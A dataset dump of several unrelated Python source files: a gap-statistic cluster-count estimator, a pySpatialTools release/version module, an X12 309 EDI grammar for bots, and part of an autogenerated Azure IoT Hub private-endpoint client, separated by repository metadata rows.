'cluster_sizes': self.cluster_sizes,
'ref_dist': self.ref_dist,
'B': self.B,
'gap_est_method': self.gap_est_method}
def fit(self, X, cluster_labels=None,
U=None, D=None, V=None):
"""
Estimates the number of clusters using the gap statistic.
Parameters
----------
X (matrix): the observed data with observations on the rows.
cluster_labels (None or matrix, observations x len(cluster_sizes)): matrix
containing the observed cluster labels on the columns for each
value of n_clusters.
If None then will uses clusterer to estimate the number of clusters
using the provided clusterer
U, D, V: the precomputed SVD of X see set_svd_decomposition() for
details. These are only used if ref_dist = 'svd'. If they are not
provided then will compute them.
"""
if type(X) == pd.DataFrame:
self.var_names = np.array(X.columns)
else:
self.var_names = np.array(range(X.shape[1]))
if not issparse(X):
X = np.array(X)
if cluster_labels is None:
cluster_labels = self.compute_obs_clusters(X)
assert cluster_labels.shape == (X.shape[0], len(self.cluster_sizes))
if self.ref_dist == 'svd':
if _count_none(U, D, V) == 3:
U, D, V = svd_wrapper(X)
elif _count_none(U, D, V) != 0:
raise ValueError('U, D, V must all be provided or be set to None')
self.obs_wcss = self.compute_obs_wcss(X, cluster_labels)
self.null_wcss_samples = self.sample_ref_null_wcss(X, U=U, D=D, V=V)
self.compute_n_cluster_estimate(method=self.gap_est_method)
return self
@property
def est_cluster_memberships(self):
"""
Returns the estimated cluster memberships
"""
assert self.est_n_clusters is not None
est_cluster_size_ind = np.where(
np.array(self.cluster_sizes) == self.est_n_clusters)[0][0]
return self.obs_cluster_labels[:, est_cluster_size_ind]
def compute_obs_clusters(self, X):
obs_cluster_labels = np.zeros((X.shape[0], len(self.cluster_sizes)))
for i, n_clusters in enumerate(self.cluster_sizes):
obs_cluster_labels[:, i] = self.clusterer(X, n_clusters)
return obs_cluster_labels
def compute_obs_wcss(self, X, obs_cluster_labels):
"""
Computes the within class sum of squres for the observed clusters.
"""
n_cluster_sizes = len(self.cluster_sizes)
obs_wcss = np.zeros(n_cluster_sizes)
for j in range(n_cluster_sizes):
# make sure the number of unique cluster labels is equal to
# the preported number of clusters
# TODO: we might not want this restrictin
assert len(set(obs_cluster_labels[:, j])) \
== self.cluster_sizes[j]
obs_wcss[j] = get_pooled_wcss(X, obs_cluster_labels[:, j])
return obs_wcss
def sample_null_reference(self, X, U=None, D=None, V=None):
if self.ref_dist == 'uniform':
return sample_uniform_null(X)
elif self.ref_dist == 'svd':
return sample_svd_null(X, U, D, V)
def sample_ref_null_wcss(self, X, U=None, D=None, V=None):
null_wcss_samples = np.zeros((len(self.cluster_sizes), self.B))
for b in range(self.B):
# sample null reference distribution
X_null = self.sample_null_reference(X, U=U, D=D, V=V)
# cluster X_null for the specified n_clusters
for i, n_clusters in enumerate(self.cluster_sizes):
# cluster. null sample
null_cluster_labels = self.clusterer(X_null, n_clusters)
null_wcss_samples[i, b] = get_pooled_wcss(X_null,
null_cluster_labels)
return null_wcss_samples
@property
def E_log_null_wcss_est(self):
"""
Estimate of the expected log(WCSS) of the null reference distribution
"""
assert self.null_wcss_samples is not None
return np.log(self.null_wcss_samples).mean(axis=1)
@property
def E_log_null_wcss_est_sd(self):
"""
Standard deviation of the estimated expected log(WCSS) from the null
distribuiton
"""
assert self.null_wcss_samples is not None
return np.std(np.log(self.null_wcss_samples), axis=1)
@property
def log_obs_wcss(self):
"""
log(WCSS) of the observed cluseters
"""
assert self.obs_wcss is not None
return np.log(self.obs_wcss)
@property
def gap(self):
"""
Returns the gap statistic i.e. E*(log(WCSS_null)) - log(WCSS_obs)
where E* means the estimated expected value
"""
assert self.obs_wcss is not None
return self.E_log_null_wcss_est - self.log_obs_wcss
@property
def adj_factor(self):
return sqrt(1.0 + (1.0/self.B))
def compute_n_cluster_estimate(self, method=None):
"""
Parameters
----------
method (str): which method to use to estimate the number of clusters.
Currently one of ['firstmax', 'globalmax', 'Tibs2001SEmax']
firstmax: finds the fist local max of f
globalmax: finds the global max of f
Tibs2001SEmax: uses the method detailed in (Tibshirani et al, 2001)
i.e. the first k (smallest number of clusters) such that
f[k] >= f[k + 1] - se[k + 1] * se_adj_factor
return_possibilities (bool): whether or not to also return the
other possible estimates
Output
------
est_n_clusters, possibilities
est_n_clusters: the estimated number of clustesr
possibilities: local maxima of the given method
"""
if method is None:
method = self.gap_est_method
est_n_clusters, possibilities = \
estimate_n_clusters(cluster_sizes=self.cluster_sizes,
f=self.gap,
se=self.E_log_null_wcss_est_sd,
se_adj_factor=self.adj_factor,
method=method)
self.gap_est_method = method
self.est_n_clusters = est_n_clusters
self.possible_n_clusters = possibilities
def plot_wcss_curves(self):
# plot observed log(WCSS)
plt.plot(self.cluster_sizes,
self.log_obs_wcss,
marker="$O$",
color='blue',
ls='solid',
label='obs')
# plot the expected log(WCSS) of the null references
plt.plot(self.cluster_sizes,
self.E_log_null_wcss_est,
marker='$E$',
color='red',
ls='dashed',
label='E null')
plt.xticks(self.cluster_sizes)
plt.xlabel('number of clusters')
plt.ylabel('log(WCSS)')
plt.legend()
def plot_gap(self, errorbars=True, include_est=True,
include_possibilities=False):
if errorbars:
# TODO: should we use s_adj for error bars?
plt.errorbar(self.cluster_sizes,
self.gap,
color='black',
yerr=self.E_log_null_wcss_est_sd)
else:
plt.plot(self.cluster_sizes,
self.gap,
color='black',
marker='x')
plt.xticks(self.cluster_sizes)
plt.xlabel('number of clusters')
plt.ylabel('gap')
# maybe include the estimated numer of clusters
if include_est:
plt.axvline(x=self.est_n_clusters, color='red',
label='estimated {} clusters'.
format(self.est_n_clusters))
# maybe include other possible estimates
if include_possibilities:
label = 'possibility'
for n in self.possible_n_clusters:
if n == self.est_n_clusters:
continue
plt.axvline(x=n, color='blue', ls='dashed', lw=1, label=label)
label = '' # HACK: get only one 'possibility' label to show up
plt.legend()
def save(self, fname, compress=True, include_data=False):
# save_dict = {'ref_dist': self.ref_dist,
# 'B': self.B,
# 'cluster_sizes': self.cluster_sizes,
# 'gap_est_method': self.gap_est_method,
# 'clusterer_name': self.clusterer_name,
# 'clusterer_kwargs': self.clusterer_kwargs,
# 'obs_cluster_labels': self.obs_cluster_labels,
# 'obs_wcss': self.obs_wcss,
# 'null_wcss_samples': self.null_wcss_samples,
# 'est_n_clusters': self.est_n_clusters,
# 'possible_n_clusters': self.possible_n_clusters,
# 'metadata': self.metadata}
# if include_data:
# save_dict['X'] = self.X
# save_dict['U'] = self.U
# save_dict['D'] = self.D
# save_dict['V'] = self.V
# else:
# save_dict['X'] = None
# save_dict['U'] = None
# save_dict['D'] = None
# save_dict['V'] = None
joblib.dump(self,
filename=fname,
compress=compress)
# @classmethod
# def load_from_dict(cls, load_dict):
# # initialize class
# GS = cls(clusterer=load_dict['clusterer_name'],
# clusterer_kwargs=load_dict['clusterer_kwargs'],
# cluster_sizes=load_dict['cluster_sizes'],
# ref_dist=load_dict['ref_dist'],
# B=load_dict['B'],
# gap_est_method=load_dict['gap_est_method'])
# GS.obs_cluster_labels = load_dict['obs_cluster_labels']
# GS.obs_wcss = load_dict['obs_wcss']
# GS.null_wcss_samples = load_dict['null_wcss_samples']
# GS.est_n_clusters = load_dict['est_n_clusters']
# GS.possible_n_clusters = load_dict['possible_n_clusters']
# GS.X = load_dict['X']
# GS.U = load_dict['U']
# GS.D = load_dict['D']
# GS.V = load_dict['B']
# GS.metadata = load_dict['metadata']
# return GS
@classmethod
def load(cls, fname):
# load_dict = joblib.load(fname)
# return cls.load_from_dict(load_dict)
return joblib.load(fname)
@classmethod
def from_precomputed_wcss(cls, cluster_sizes, obs_wcss,
null_wcss_samples, **kwargs):
"""
Initializes GatStat object form precomputed obs_wcss and
null_wcss_smaples.
"""
assert len(obs_wcss) == len(cluster_sizes)
assert null_wcss_samples.shape[0] == len(cluster_sizes)
GS = cls(cluster_sizes=cluster_sizes, **kwargs)
GS.obs_wcss = obs_wcss
GS.null_wcss_samples = null_wcss_samples
GS.B = null_wcss_samples.shape[1] # NOTE: B may be differnt
GS.compute_n_cluster_estimate()
return GS
| [
"[email protected]"
] | |
7cc5e26b3b002ea59b7a91392cf6ad2b4d9042bb | 12b5584956797fcb0f48e7971bc074ae13a37489 | /pySpatialTools/release.py | b4439a5b0eb2c44ff32c36629289ad36af5e241a | [
"MIT"
] | permissive | tgquintela/pySpatialTools | a0ef5b032310aa1c140e805f4ee8c4a40fd2d10e | e028008f9750521bf7d311f7cd3323c88d621ea4 | refs/heads/master | 2020-05-21T22:09:08.858084 | 2017-02-10T11:18:41 | 2017-02-10T11:18:41 | 39,067,763 | 8 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,919 | py | """Release data for pySpatialTools.
The information of the version is in the version.py file.
"""
from __future__ import absolute_import
import os
import sys
import time
import datetime
basedir = os.path.abspath(os.path.split(__file__)[0])
## Quantify the version
MAJOR = 0
MINOR = 0
MICRO = 0
ISRELEASED = False
VERSION = '%d.%d.%d' % (MAJOR, MINOR, MICRO)
QUALIFIER = ''
def write_version_py(filename=None):
cnt = """\
version = '%s'
"""
if not filename:
filename = os.path.join(
os.path.dirname(__file__), 'pySpatialTools', 'version.py')
a = open(filename, 'w')
try:
a.write(cnt % (version))
finally:
a.close()
def write_versionfile():
"""Creates a static file containing version information."""
versionfile = os.path.join(basedir, 'version.py')
text = '''"""
Version information for pySpatialTools, created during installation by
setup.py.
Do not add this file to the repository.
"""
import datetime
version = %(version)r
date = %(date)r
# Development version
dev = %(dev)r
# Format: (name, major, minor, micro, revision)
version_info = %(version_info)r
# Format: a 'datetime.datetime' instance
date_info = %(date_info)r
# Format: (vcs, vcs_tuple)
vcs_info = %(vcs_info)r
'''
# Try to update all information
date, date_info, version, version_info, vcs_info = get_info(dynamic=True)
def writefile():
fh = open(versionfile, 'w')
subs = {
'dev': dev,
'version': version,
'version_info': version_info,
'date': date,
'date_info': date_info,
'vcs_info': vcs_info
}
fh.write(text % subs)
fh.close()
## Mercurial? Change that
if vcs_info[0] == 'mercurial':
# Then, we want to update version.py.
writefile()
else:
if os.path.isfile(versionfile):
# This is *good*, and the most likely place users will be when
# running setup.py. We do not want to overwrite version.py.
# Grab the version so that setup can use it.
sys.path.insert(0, basedir)
from version import version
del sys.path[0]
else:
# Then we write a new file.
writefile()
return version
def get_revision():
"""Returns revision and vcs information, dynamically obtained."""
vcs, revision, tag = None, None, None
hgdir = os.path.join(basedir, '..', '.hg')
gitdir = os.path.join(basedir, '..', '.git')
if os.path.isdir(gitdir):
vcs = 'git'
# For now, we are not bothering with revision and tag.
vcs_info = (vcs, (revision, tag))
return revision, vcs_info
def get_info(dynamic=True):
## Date information
date_info = datetime.datetime.now()
date = time.asctime(date_info.timetuple())
revision, version, version_info, vcs_info = None, None, None, None
import_failed = False
dynamic_failed = False
if dynamic:
revision, vcs_info = get_revision()
if revision is None:
dynamic_failed = True
if dynamic_failed or not dynamic:
# All info should come from version.py. If it does not exist, then
# no vcs information will be provided.
sys.path.insert(0, basedir)
try:
from version import date, date_info, version, version_info,\
vcs_info
except ImportError:
import_failed = True
vcs_info = (None, (None, None))
else:
revision = vcs_info[1][0]
del sys.path[0]
if import_failed or (dynamic and not dynamic_failed):
# We are here if:
# we failed to determine static versioning info, or
# we successfully obtained dynamic revision info
version = ''.join([str(major), '.', str(minor), '.', str(micro)])
if dev:
version += '.dev_' + date_info.strftime("%Y%m%d%H%M%S")
version_info = (name, major, minor, micro, revision)
return date, date_info, version, version_info, vcs_info
## Version information
name = 'pySpatialTools'
major = "0"
minor = "0"
micro = "0"
## Declare current release as a development release.
## Change to False before tagging a release; then change back.
dev = True
description = """Python package for studying spatial irregular heterogenous
data."""
long_description = """
This package is built in order to provide prototyping tools in python to deal
with spatial data in python and model spatial-derived relations between
different elements in a system. In some systems, due to the huge amount of
data, the complexity of their topology their local nature or because other
practical reasons we are forced to use only local information for model the
system properties and dynamics.
pySpatialTools is useful for complex topological systems with different type
of spatial data elements and feature data elements in which we are not able to
study alls at once because of the data size.
pySpatialTools could be not recommendable for treating some specific problems
with homogeneous and/or regular data which could be treated with other python
packages, as for example computational linguistics (nltk), computer vision or
grid data (scipy.ndimage and openCV) or others.
"""
## Main author
author = 'T. Gonzalez Quintela',
author_email = '[email protected]',
license = 'MIT'
authors = {'tgquintela': ('T. Gonzalez Quintela', '[email protected]')}
maintainer = ""
maintainer_email = ""
url = ''
download_url = ''
platforms = ['Linux', 'Mac OSX', 'Windows', 'Unix']
keywords = ['math', 'data analysis', 'Mathematics', 'spatial networks',
'spatial correlations', 'framework', 'social sciences',
'spatial analysis', 'spatial ecology']
classifiers = [
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
# Specify the Python versions you support here
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
# Topic information
'Topic :: Software Development :: Build Tools',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Scientific/Engineering :: Sociology',
'Topic :: Scientific/Engineering :: Data Analysis',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Scientific/Engineering :: Mathematics']
date, date_info, version, version_info, vcs_info = get_info()
if __name__ == '__main__':
# Write versionfile for nightly snapshots.
write_versionfile()
| [
"[email protected]"
] | |
645b5682e9763727540ac5d791536bf21623922f | 62e58c051128baef9452e7e0eb0b5a83367add26 | /x12/5020/309005020.py | 83361578777dc5a5345e3f1329482955522de273 | [] | no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 1,711 | py | from bots.botsconfig import *
from records005020 import recorddefs
syntax = {
'version' : '00403', #version of ISA to send
'functionalgroup' : 'AQ',
}
structure = [
{ID: 'ST', MIN: 1, MAX: 1, LEVEL: [
{ID: 'M10', MIN: 1, MAX: 1},
{ID: 'VEH', MIN: 0, MAX: 10},
{ID: 'CII', MIN: 0, MAX: 3},
{ID: 'NM1', MIN: 0, MAX: 999, LEVEL: [
{ID: 'DMG', MIN: 0, MAX: 1},
{ID: 'DMA', MIN: 0, MAX: 1},
{ID: 'REF', MIN: 0, MAX: 10},
{ID: 'N3', MIN: 0, MAX: 2},
{ID: 'N4', MIN: 0, MAX: 1},
]},
{ID: 'P4', MIN: 1, MAX: 20, LEVEL: [
{ID: 'LX', MIN: 1, MAX: 9999, LEVEL: [
{ID: 'M13', MIN: 0, MAX: 1},
{ID: 'M11', MIN: 0, MAX: 1},
{ID: 'N9', MIN: 0, MAX: 999},
{ID: 'N1', MIN: 0, MAX: 20, LEVEL: [
{ID: 'N3', MIN: 0, MAX: 2},
{ID: 'N4', MIN: 0, MAX: 1},
{ID: 'DTM', MIN: 0, MAX: 1},
{ID: 'PER', MIN: 0, MAX: 1},
{ID: 'X1', MIN: 0, MAX: 1},
]},
{ID: 'M12', MIN: 0, MAX: 1, LEVEL: [
{ID: 'R4', MIN: 0, MAX: 10},
]},
{ID: 'VID', MIN: 0, MAX: 999, LEVEL: [
{ID: 'M7', MIN: 0, MAX: 5},
{ID: 'N10', MIN: 0, MAX: 999, LEVEL: [
{ID: 'VC', MIN: 0, MAX: 999},
{ID: 'MAN', MIN: 0, MAX: 999},
{ID: 'H1', MIN: 0, MAX: 99, LEVEL: [
{ID: 'H2', MIN: 0, MAX: 99},
]},
]},
]},
]},
]},
{ID: 'SE', MIN: 1, MAX: 1},
]}
]
| [
"[email protected]"
] | |
3fa94711deee1501fffaea2ebd96a02444740ebb | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/iothub/azure-mgmt-iothub/azure/mgmt/iothub/v2021_03_03_preview/aio/operations/_private_endpoint_connections_operations.py | 9539dfaa9da4998ba5e5dbec5e4b63fc87b7dedd | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 27,952 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, IO, List, Optional, TypeVar, Union, cast, overload
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._private_endpoint_connections_operations import (
build_delete_request,
build_get_request,
build_list_request,
build_update_request,
)
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class PrivateEndpointConnectionsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.iothub.v2021_03_03_preview.aio.IotHubClient`'s
:attr:`private_endpoint_connections` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace_async
async def list(
self, resource_group_name: str, resource_name: str, **kwargs: Any
) -> List[_models.PrivateEndpointConnection]:
"""List private endpoint connections.
List private endpoint connection properties.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of PrivateEndpointConnection or the result of cls(response)
:rtype: list[~azure.mgmt.iothub.v2021_03_03_preview.models.PrivateEndpointConnection]
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-03-03-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-03-03-preview")
)
cls: ClsType[List[_models.PrivateEndpointConnection]] = kwargs.pop("cls", None)
request = build_list_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("[PrivateEndpointConnection]", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections"
}
@distributed_trace_async
async def get(
self, resource_group_name: str, resource_name: str, private_endpoint_connection_name: str, **kwargs: Any
) -> _models.PrivateEndpointConnection:
"""Get private endpoint connection.
Get private endpoint connection properties.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection. Required.
:type private_endpoint_connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PrivateEndpointConnection or the result of cls(response)
:rtype: ~azure.mgmt.iothub.v2021_03_03_preview.models.PrivateEndpointConnection
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-03-03-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-03-03-preview")
)
cls: ClsType[_models.PrivateEndpointConnection] = kwargs.pop("cls", None)
request = build_get_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
async def _update_initial(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
private_endpoint_connection: Union[_models.PrivateEndpointConnection, IO],
**kwargs: Any
) -> _models.PrivateEndpointConnection:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-03-03-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-03-03-preview")
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.PrivateEndpointConnection] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(private_endpoint_connection, (IO, bytes)):
_content = private_endpoint_connection
else:
_json = self._serialize.body(private_endpoint_connection, "PrivateEndpointConnection")
request = build_update_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {}) # type: ignore
return deserialized # type: ignore
_update_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
@overload
async def begin_update(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
private_endpoint_connection: _models.PrivateEndpointConnection,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.PrivateEndpointConnection]:
"""Update private endpoint connection.
Update the status of a private endpoint connection with the specified name.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection. Required.
:type private_endpoint_connection_name: str
:param private_endpoint_connection: The private endpoint connection with updated properties.
Required.
:type private_endpoint_connection:
~azure.mgmt.iothub.v2021_03_03_preview.models.PrivateEndpointConnection
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either PrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothub.v2021_03_03_preview.models.PrivateEndpointConnection]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def begin_update(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
private_endpoint_connection: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.PrivateEndpointConnection]:
"""Update private endpoint connection.
Update the status of a private endpoint connection with the specified name.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection. Required.
:type private_endpoint_connection_name: str
:param private_endpoint_connection: The private endpoint connection with updated properties.
Required.
:type private_endpoint_connection: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either PrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothub.v2021_03_03_preview.models.PrivateEndpointConnection]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def begin_update(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
private_endpoint_connection: Union[_models.PrivateEndpointConnection, IO],
**kwargs: Any
) -> AsyncLROPoller[_models.PrivateEndpointConnection]:
"""Update private endpoint connection.
Update the status of a private endpoint connection with the specified name.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection. Required.
:type private_endpoint_connection_name: str
:param private_endpoint_connection: The private endpoint connection with updated properties. Is
either a PrivateEndpointConnection type or a IO type. Required.
:type private_endpoint_connection:
~azure.mgmt.iothub.v2021_03_03_preview.models.PrivateEndpointConnection or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either PrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothub.v2021_03_03_preview.models.PrivateEndpointConnection]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-03-03-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-03-03-preview")
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.PrivateEndpointConnection] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._update_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
